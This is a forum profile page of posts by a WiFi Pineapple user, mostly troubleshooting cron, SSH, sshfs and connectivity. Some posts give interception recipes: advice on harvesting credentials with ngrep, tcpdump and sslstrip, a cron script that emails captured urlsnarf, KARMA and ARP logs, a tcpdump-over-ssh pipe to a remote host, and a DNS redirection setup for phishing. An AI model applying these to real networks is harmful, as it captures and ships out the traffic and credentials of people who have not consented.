telot
-
Posts
803 -
Joined
-
Last visited
-
Days Won
12
Posts posted by telot
-
-
Good from-the-field knowledge petertfm! Thanks for the info
I always run my pineapple off of ~5 volts from USB - not batts. Ive done tests (you can search them out here on the forums) that show 5 volts does not at all effect the wifi range at all compared to 12 volts. The thing you have to keep in mind with batteries, is that the higher the voltage, the less amps your pineapple eats up. For example, a 12v battery with 1000mah (milliamp hours) will last waaay longer than a 5v battery with 1000mah. It's the amps that keeps your pineapple alive, not the voltage rating.
telot
-
Ngrep sounded great on the mark 3 but I know it was resource hungry just like sslstrip, I want to collect credentials so running sslstrip would be #1 and something like ngrep would be cool too But would it be easier to just find that data afterwards like with a pcap file from tcpdump?
so I was thinking maybe we could use an offsite toolkit for the pineapple to do this kind of stuff and make it as easy and cool looking like the pineapple, possibly have a feature that formats a thumb drive and sets up the partitions plus files like pre-installed packages and roll pages?
BTW where is ngrep? it's stated as "MITM tools: urlsnarf, dnsspoof & ngrep" in the hak shop?
What are your opinions on collecting data? have it all on the pineapple or some off site?
ngrep is only good for catching plaintext credentials - and you have to specify quite precisely what you want out of it (ftp logins for example). If you're already tcpdumping, you're going to get every plaintext credential anyways, you'll just have to search them out in the capture file - so if you're comfortable in wireshark with some packet analysis, you'll be fine - but if you want something easy, or more likely, if you're targeting a victim for one type of login (their company ftp say...) ngrep is the way to go. Ngrep was in the gui on the mark3 (and still is) but it didn't make the transition to the mark4 for some reason...you'd have to ask Seb. I believe its still installed on the mark4, just not in the UI (command line ftw anyways right?) - but I never use it lol, I'm a pcap man.
As for collecting data on or off site - I don't think you'd have any problem running tcpdump, ngrep, and sslstrip and dumping it all to a big fat USB stick and then scp'ing it off at your leisure - give it a shot, theres no harm in trying :)
telot
-
Darren interviewed Ebon (created and founder of raspi) at MakerFaire last week...I smell an upcoming project
I've had mine on order for months - finally got the confirmation email that it will ship in another 2-3 weeks. I can't friggin wait
telot
-
Anyone here use the cron on the pineapple? I can't seem to get it to work. Heres my crontab entry from the 'Jobs' gui:
*/5 * * * * /www/pineapple/scripts/cleanup.sh
*/5 * * * * /www/pineapple/ssh/ssh-keepalive.sh
*/5 * * * * /usb/pinesave/telotreport.sh
Inside /usb/pinesave/telotreport.sh:
#!/bin/bash TODAY=$(date +"%m-%d-%y") rm /usb/emailreport.log du -h /usb/cap.$TODAY.pcap > /usb/emailreport.log cat /www/pineapple/logs/associations.log >> /usb/emailreport.log cat /www/pineapple/logs/urlsnarf.log >> /usb/emailreport.log ./usb/killurlsnarf.sh ./usb/starturlsnarf.sh cat /www/pineapple/logs/dnsspoof.log >> /usb/emailreport.log cat /proc/net/arp >> /usb/emailreport.log cat /tmp/dhcp.leases; echo '\n'; cat /proc/net/arp; echo '\n'; grep KARMA /tmp/karma.log | grep -v -e enabled | grep -v -e malloc | grep -v -e CTRL_IFACE | grep -v -e KARMA_STATE | grep -v -e Request >> /us$ ssmtp -v telot@telotsemail.com < /usb/emailreport.log
I know, I know, its a very rough draft of my email reports module I'll make someday. So as you can see, I remove the old log, take a size reading on today's capture file, cat the urlsnarf.log and restart it, then cat a bunch of other things and email it off. Just running the script works great - I get the email and its got all the goodies in it. I was hoping to get this to be sent to me every hour or two, but wanted to test it on 5 minute intervals. Most unfortunately I don't ever receive any emails. So I ran a test - I put a script in /www/pineapple/scripts/ called test.sh - in it is simply:
#!/bin/sh touch /www/testthis
I added it to the cron (again, on the Jobs page) for 5 minute intervals - now it looks like this:
*/5 * * * * /www/pineapple/scripts/cleanup.sh
*/5 * * * * /www/pineapple/ssh/ssh-keepalive.sh
*/5 * * * * /www/pineapple/scripts/test.sh
Came back 6 minutes later and ls /www/ and testthis is there. So what is stopping telotreport.sh from working? They're both chmod +x'd - same permissions as the cleanup.sh script. Any advice would be greatly appreciated. Thanks guys
telot
-
Looks great reflex! Mine is in the mail now and I will surely be contributing. Can't wait to check it out!
telot
-
I'm having some issues with SSH. I put in my autossh command, setup my relay server - I press Connect and tell it to be persistent - all is good. Its the SSH on boot that I'm having troubles with. Looking at the code, it seems the button just puts the autossh command into /etc/rc.local - well for some reason this is not happening. After pressing the button on the gui page, it stays "disabled", and when I cat /etc/rc.local and theres no autossh entry. I tried to manually paste it in there (above the line that says "Add your commands above this line") and reboot, but it still does not connect upon bootup. Did something change in how the pineapple handles rc.local in the newest firmware? To be honest, I never messed with autossh before 2.1.0, so I guess I don't know if it was broken before or only after...Can anyone else confirm/deny rc.local issues? Thanks!
EDIT: I threw in some other stuff in the rc.local and it seems to be loading (iptables stuff for wan port). Maybe I'm on crack or something?
telot
-
Ok - the pragmatic side of me kicked in and settled for an ssh pipe instead of sshfs. I did a
tcpdump -i eth0 -n net 192.168.1.0/24 | ssh -p 2222 telot@internalIP "cat > /home/telot/pinecap.pcap" &
keep in mind I use port 2222 as my standard ssh port. It seems to be holding up now - it borked the mark3 at first, but thats probably because I was running everything under the sun (ngrep, urlsnarf, dnsspoof - etc).
Strange thing is, when I do this the pinecap.pcap on my cloud server isn't recognized as a valid file by wireshark. Very odd as all the data seems to be there. Any wireshark fanatics out there can maybe shed some light on why this may be?
telot
-
The new UI looks great Seb! Still very simple, but much more elegant now. The new modules system looks especially pro. Thanks as always!
telot
-
Thank you for the tip, I upgraded my firmware to 2.0.0, went through the quick setup, and still having issues
How bout detailing the steps you're taking when connecting in win7 or backtrack? That way we can point out if/where you're making any errors.
Note: For free I mean...
telot
-
And with "--force-depends" option ?
opkg install sshfs --force-depends
I did not try myself, just an idea :)
I took your advice WM - thank you. I got it installed by now it stalls with a Fuse error telling me to modprobe fuse (to which I insmod fuse - got no errors - but lmsod shows no fuse still!). Heres the command I'm trying to run:
sshfs -o ssh-command="ssh -p 2222" telot@internalIP: /root/telot
Very frustrating stuff...I'm half thinking about just buying another mark4 for the extra features anyways...lol this might be my impetus
telot
-
Good afternoon everyone!
On this lovely rainy memorial day weekend, I'm trying to get my old MarkIII to be useful once more. My brother recently moved in with us for the summer, and think it'd be a great public service for me to educate him and his friends about the dangers of open wifi connections. My MarkIII has been sitting collecting dust for past several months, since the markIV came into town, so I thought I'd hook up the markIII to my internal network and have it on all the time - maybe even come up with a "Wall of Shame" kind of deal - showing the kids the urlsnarf/ngrep/whatever data I cap'd off them. Thats all well and good - I changed the network settings on the markIII to match my internal network and whatnot and its happily karma'ing up victims left and right. Now comes the problem.
I'd of course like to tcpdump all the traffic on eth0, but the markIII is so short in the storage department, I thought hey! what a great application of sshfs! Unfortunately when I do a
opkg update
opkg install sshfs
It comes back with an error:
Collected errors:
* satisfy_dependencies_for: Cannot satisfy the following dependencies for sshfs:
* kernel (= 3.3.7-1-607db4585f74c0eb4be22dc576d44e8e) *
* opkg_install_cmd: Cannot install package sshfs.
Any idea on how to fix this? I googled my ass off and came back with squat.
Thanks for any help guys, as always
telot
-
Excellently done! Can't wait to try it out!
:::Picks up phone to call friendly Nexus owner down the street:::...
Edit: Did you make any attempts at mounting the microSD storage for use on the pineapple? That would surely be total win!
telot
-
With the mark2, you'll have to use a program on the laptop you have sharing it's internet connection with the pineapple. Its called wireshark and it's your new best friend. Capture your eth0 or local area connection (the one you have plugged into the pineapple) and watch those packets stream by. You can also do this with your mark4, but with a USB drive in the mark4, you can do it all on the pineapple by installing/running tcpdump. Then you can view the capture file (all the sniffed traffic) later on any computer with wireshark.
See my guides on both configuring a USB drive and setting up tcpdump here:
https://github.com/sebkinne/wifipineapple/wiki/tcpdump
Learning to properly and effectively use wireshark will take some googling and to get good at deep packet analysis will require dozens of hours of practice.
Oh yeah, and there's also urlsnarf, that kind of sniffs traffic too...but someone else will have to fill you in on that as I don't really use it.
Hope this helps!
telot
-
In fact I was using my wifes win7 failtop at the time :D
telot
-
I had this problem the other day - quick power cycle of my lapo is what fixed it. No clue why...but it did
Pragmatism ftw!
telot
-
I use a different method with my pineapple. I prefer not to use arp-based spoofing attacks as I've had it set off alarms in certain victims. Without going into a 10 page explanation, simply put -
I prefer to use create my own DNS zones files and host them on a remote bind9 DNS server. The DNS server, redirects all the desired sites to an apache2 server. This way the victim can still get internet if they're not going to one of the phish'd sites.
The apache2 server is configured exactly like the httpd server on the pineapple would be. Since it is over the internet I prefer to use apache for security reasons.
Definitely need to brush up on my PHP : (
That sounds awesome bobbi! I'm sure I wouldn't be the only one who'd love a how-to guide on this. If you're up to it, I think itd be a great addition to combine with the other remote server based features like reverse ssh, cron'd remote log uploading, etc
telot
-
As long as a VPN or proxy exists, no website can be 100% blocked.
However, an ISP could always block these technologies, if they are using deep packet inspection, like how China did with TOR.
Then we could be doomed.
Oh comeon Inf, you know its a cat and mouse game - they'll block VPN, we'll use ssh tunnels - they'll block ssh tunnels, we'll use TOR - they'll block TOR, we'll use I2P - they'll block l2P, we'll invent a new form of dark net or tunneling or whatever. Its the hacker mentality and we have the upper hand...because we as a community are smarter than they are :)
telot
-
Darren, man, I wish nothing but the best for you, Snubsie, and the entire Hak5 crew. I've recently found this show and am VERY fond of it...it's like my geek friends showing up in my living room to take the time to educate me in a very down to earth way on specific things that are of extreme interest to me.
:::Aww yeah face:::
Haha I've felt the same way about the show - It reminds me of in college, where we ran a small tutoring group for the philosophy department, where we'd drink beers and help each other out (yes, I graduated psy/phil major...biggest regret of my adult life is not going into comp sci). This is exactly how Hak5 feels, except its way more relevant to my life now that I have a real job lol. I too hope things don't change, but I believe during every single merger/buy out in the history of the world the company doing the merging/buying has said "Nothing will change"...but something ALWAYS changes - particularly with a publicly traded company where revenues must increase every single year. I'm not saying the change is always bad - these types of things are never black and white. The company I work for was bought out 4 years ago and its been a great thing - we have more personell resources, our business has expanded, and we have a bigger checkbook for investing in our inventory (i.e. macbook pros instead of 5 year old shitboxes). Hak5 has a lot going for it - the longest running show on rev3, a successful store, and one helluva dedicated community - no other rev3 show can claim any of that like hak5 can. If I had to guess I'd say that some of the more mainstream and funny shows (the social engineering show, maybe epic mealtime) could transition to television - but I'd guess the uber geeky shows will stay on the internet. Hopefully Discovery Networks will have learned from SHOWCASE/PurePwnage's mistake and not take something so esoteric and geeky as a show about hacking and try and bring it to the mainstream. Heres to hoping and good luck to all the hak5 crew - keep up the great work despite any adversity and we'll be here watching and supporting!
telot
-
i have the same setup you do and mac is very temperamental with ICS: first thing go over this post in the forums, http://forums.hak5.org/index.php?showtopic=25889
the long and the short is you will have to set your usb adapter to 192.168.2.1 as mac only run ics over that exact ip address - next plug the ethernet cable from the usb dongle into lan/POE port on the pineapple, then you will have to set the lan/poe on the pineapple to ip:(vi /etc/config/network)192.168.2.X (anything except 1) subnet mask of 255.255.255.0 and a gateway of 192.168.2.1 since it is treating your laptop lan as the gateway. once all this is setup you might have to power cycle the pineapple and then disable/enable ICS on the mac, sometimes you have the cycle ICS a couple times - dont ask me why it is just mac's annoyances. do not run the shell scripts for auto setup as they are written for linux and eventhough mac has bash it doesn't mater, ics ONLY works on 192.168.2.1 if i am wrong on any of this info please correct me but this is what i have found with my setup.
All fine advice for someone with Mac OSX, but the OP is running a flavor of Ubuntu :)
telot
-
This might be a silly question, but which Ethernet port on the pineapple are you plugging in to?
Despite your more custom setup with the mb air, you seem to be doing everything right, If your plugging in to the LAN port instead of the Poe port, that could explain all your troubles here. If you are using the poe port and it's not working, load a bt5 live disk on a friends computer that has a proper Ethernet port on it, as that is the major difference between your setup and the norm. Good luck
telot
-
This looks bloody fantastic brianzimm! Perfect implementation! This is at the top of my list of modules to try ASAP. Thanks man!
telot
-
then i reciev this error message:
BusyBox v1.19.3 (2012-02-21 19:25:47 GMT) built-in shell (ash)
Enter 'help' for a list of built-in commands.
_______ ________ __ \
| |.-----.-----.-----.| | | |.----.| |_ \ \
| - || _ | -__| || | | || _|| _| \ \ \
|_______|| __|_____|__|__||________||__| |____| <, .v , // ) ) ) ) )
|__| W I R E L E S S F R E E D O M \\; \// // / / /
ATTITUDE ADJUSTMENT (bleeding edge, r29839) ---------- ;\\|||//; / /
* 1/4 oz Vodka Pour all ingredients into mixing ,'<\/><\/` /
* 1/4 oz Gin tin with ice, strain into glass.,.`X/\><\\>`
* 1/4 oz Amaretto ;>/>><\\><\/`
* 1/4 oz Triple sec |<\\>>X/<>/\|
* 1/4 oz Peach schnapps `<\/><\/><\\;
* 1/4 oz Sour mix '/\<>/\<>/'
* 1 splash Cranberry juice `<\/><;`
-----------------------------------------------------WiFi_Pineapple MKIV
root@Pineapple:~# Type nano /etc/config/network
-ash: Type: not found
root@Pineapple:~# nano /etc/config/network
Error opening terminal: xterm-256color.
root@Pineapple:~# nano /etc/config/network
Error opening terminal: xterm-256color.
root@Pineapple:~#
http://lmgtfy.com/?q=Error+opening+terminal%3A+xterm-256color.
-
The topic of dyndns came up in another thread, and Mr. Protocol was somewhat incorrectly dismissive of the idea. Also, you all seem to go to great lengths with reverse-ssh in order to access your pineapples remotely. I'm here to tell you thats quite unnecessary. You say carriers block port 22? I'm here to say thats dead wrong. They block everything by default and direct access to your pineapple is just a phone call away. Let me explain.
Mobile termination is a phrase used in the cellular industry meaning that the device is capable of being reached from the internet. For instance, a normal smartphone can access the internet just fine, but if you get its IP address and try pinging it/accessing it from a computer, you'll be blocked. Hence the reverse-tcp action. Well, turns out all you have to do is call up your carrier and request a specialized option on your cell plan called...you guessed it...mobile termination. Now, just calling up the 1800 number of verizon and demanding mobile termination from the first person that answers won't get you anywhere. With the CDMA carriers at least, you can use the phrase "Public IP address - not a private one like I've got, like you give out to smart phones - I need a PUBLIC ip address...Yes, this is for an M2M application" - you can even request a public STATIC ip address if you so wish...though Verizon will try and charge you a one time $500 setup fee for your entire account...you can negotiate with them however, saying you've only got one line of service you want it for (I've seen them give it away for free). Sprint is much easier, you ask for the public static IP and they charge you an extra $3 bucks a month for it. AT&T on the other hand, you need to request a special APN and lucky for you, I've done all the research on which of their hundreds of APNs is the best for us. The APN is called: I2GOLD - its mobile terminated and public. So if you want a static IP (nice to have in general if you ask me...) or if you want to stick with dynamic and use a service like dyndns - either way you're no longer depending on having an always-on server reverse-ssh'ing to your pineapple - which is really just another component with the possibility of failure. This reduces the total possible failure points by 3 (ssh connection to server, server hardware fail, or server internet provider fail). So this is where I can see using dyndns on the pineapple if you setup a 3G modem for mobile termination.
This is how I connect to my pineapple and it works great. Just plug in my 3G dongle and ssh root@telot'sStaticIP or root@telot'sdyndnshostname and off I go. It might not be the best way for some, but I have a feeling a couple people could benefit from this solution. Hope this little primer helps
telot
-
Petertfm is saying instead of tethering with bluetooth, tether with wifi. Most smartphones support creation of a wifi hotspot. If making money on a train is all your after - why use a pineapple? Just turn on the hotspot feature on your phone and charge people. If you don't have that feature on your phone, buy a openwrt router that supports the BT tether and off you go - or you could just flash openwrt onto your pineapple, removing all the cool features, and load up the tethering packages. Pineapples are meant to be pen testing security-related devices, not money making fons imho
telot
Sooo...apparently The Us And Israel Made Stuxnet...
in Everything Else
Posted
I'm not seeing any proof or confirmation that the US/Israel made it. They just claim its detailed in some upcoming book. This could be Ars just being Ars again (sensationalistic and over dramatic)...
telot